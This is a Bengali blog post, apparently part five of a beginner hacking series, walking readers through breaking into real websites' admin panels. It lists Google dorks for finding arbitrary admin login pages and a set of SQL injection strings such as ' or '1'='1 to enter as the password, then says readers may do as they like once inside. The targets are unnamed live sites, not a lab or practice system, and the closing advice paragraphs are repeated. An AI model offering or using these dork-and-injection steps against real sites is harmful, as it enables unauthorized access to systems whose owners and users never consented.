আমরা সবাই হ্যাকিং জিনিষ টার উপর একটু বেশি ইন্টারেস্ট?আর আমি আপনাদের চেষ্টা করব ১০ পর্বের মাধ্যমে কিছু টা হলে হ্যাকিং শিখানোর! আর আমি কোন বড় মাপের হ্যাকার নই কিংবা হ্যাকিং সম্পর্কে বেশি কিছু জানিও না!যা জানি তা আপনাদের কে বুঝনোর চেষ্টা করব (আমার মত করে)আর এটা শুদু মাত্র নতুন যারা হ্যাকিং জগত শুরু করতে চায় তাদের জন্য ! তাই অভিজ্ঞ ভাইয়েরা ভুল ধরিয়ে দিবেন?
আমরা ১ম ও ২য়, পর্বে আলোচনা করেছিলাম যে হ্যাকিং কি, হ্যাকার কারা,হ্যাকার কয় ধরনের? এবং হ্যাকার হতে আমাদের কী কী লাগবে!
এবং ৩য় পর্বে আমরা জেনেছিলাম হ্যাকার দের জন্য কয়েকটা ফোরাম, হ্যাকিং রিসোর্স! এবং কয়েকটা মুভি দিয়েছিলাম আশা করি অনেক এ দেখেছেন? আর দেখে অনেক কিছু শিখছেন? এবং ৪র্থ পর্বে আমরা আলোচনা করেছিলাম আইপি সম্পর্কে? আশা করি সবাই বুঝতে পেরেছেন?
আমরা আগের পর্ব গুলাতে এইটা ক্লিয়ার হয়েছি যে হ্যাকিং কি? হ্যাকার কারা? হ্যকার হতে কি কি লাগবে? একজন হ্যকার কি করলে সফল হয়! আর কি করলে পুলিশ এর হাতে দরা পরে?
তারমানে আমাদের প্রাথমিক ভাবে ক্লিয়ার হয়েছে হ্যাকিং জিনিষ টা কী?
তাই এখন আমরা মানে আজকের পর্বে আমরা একটা সাইট হ্যাক করব!!! তা হলে আসুন আমরা আমাদের প্রথম সাইট হ্যাক করি!!!!
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব।
- প্রথমে আমরা যাব http://www.google.com এ
এবার Search বক্সে যে কোন একটি Google dork লিখুন। এখন Google dork পাবেন কোথায়?? ভয় পাবেন না! আমি আছি না? আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
এবার এই গুলার মধ্যে আপনার যেটা ইচ্ছা সেটা লিখে গুগল এ সার্চ দেন।আমি সার্চ দিলাম "inurl:admin.asp"
তারপর যে কোন সাইট এ ডুকেন ! ডুকার পর এই রকম লিখা দেখবেন (সব সাইট কাজ করবে না, তাই হাল ছারবেন না চেষ্টা চালিয়ে যাবেন এবং সাইট পেয়ে যাবেন)
welcome to xxxxxxxxxx administrator panel
username :
password :
এখন ইউজার নেইম আর পাসওয়ার্ড কি দিবেন? ইউজার নেইম দিবেন “Admin” আর পাসওয়ার্ড কি দিবেন ? নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 # এখন সাবমিট করুন ! ব্যাস কাজ শেষ এখন সাইট এর এডমিন প্যনেল এ ডুকে গেলেন
এখন আপনার যা ইচ্ছা তাই করেন (ক্ষতি করবেন না) ! :evil: :-o
আবার বলছি (মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে)
আর এটা কোন প্রফেশনলা হ্যাকিং নয় ! এটা একদম সহজ ! তাই এই পদ্ধতিতে বেশি কিছু আশা করবেন না ! আগামি পর্বে RFI নিয়ে আলচোনা করব।
কিছু পরামর্শঃ
পর্যায় ক্রমে সবগুলো টিউটোরিয়াল খুব ভালোভাবে অধ্যায়ন করতে হবে। নিজে নিজে এগুলো অনুশিলনের চেষ্টা করতে হবে। কথনই নিজে অরক্ষিত থেকে হ্যাকিং চেষ্টা চালাবেন না। মনে রাখবেন কিছু কিছু টিউটোরিয়াল হবে অনৈতিক তাই সেগুলোর যেকোন দায়ভার আমি বহন করব না।
আপনার লক্ষ যদি হয় ১০ কিলোমিটার আপুনি লক্ষ টিক করুন ১০ মিটার আর এই ১০ মিটার আস্তে আস্তে করেন দেখবেন কখন ১০০মিটার হয়ে গেছে বুঝতে পারবেন না !টিক তেমন আপুনি যদি প্রথম যদি মনে করেন আপনি হ্যাক করে ফেলবেন ফেসবুক!!! তা হলে আপুনি ঘোড়ার ডিম হ্যাক করবেন!!
আপনাকে আস্তে আস্তে শুরু করতে হবে এবং প্রাথমিক ভাবে !!
দেখবেন আপনি একদিন বড় হবেন (নিশ্চিত)
বেশি কিছু বলে ফেললে ক্ষমা করবেন।
আপনাকে আস্তে আস্তে শুরু করতে হবে এবং প্রাথমিক ভাবে !!
দেখবেন আপনি একদিন বড় হবেন (নিশ্চিত)
বেশি কিছু বলে ফেললে ক্ষমা করবেন।
No comments:
Post a Comment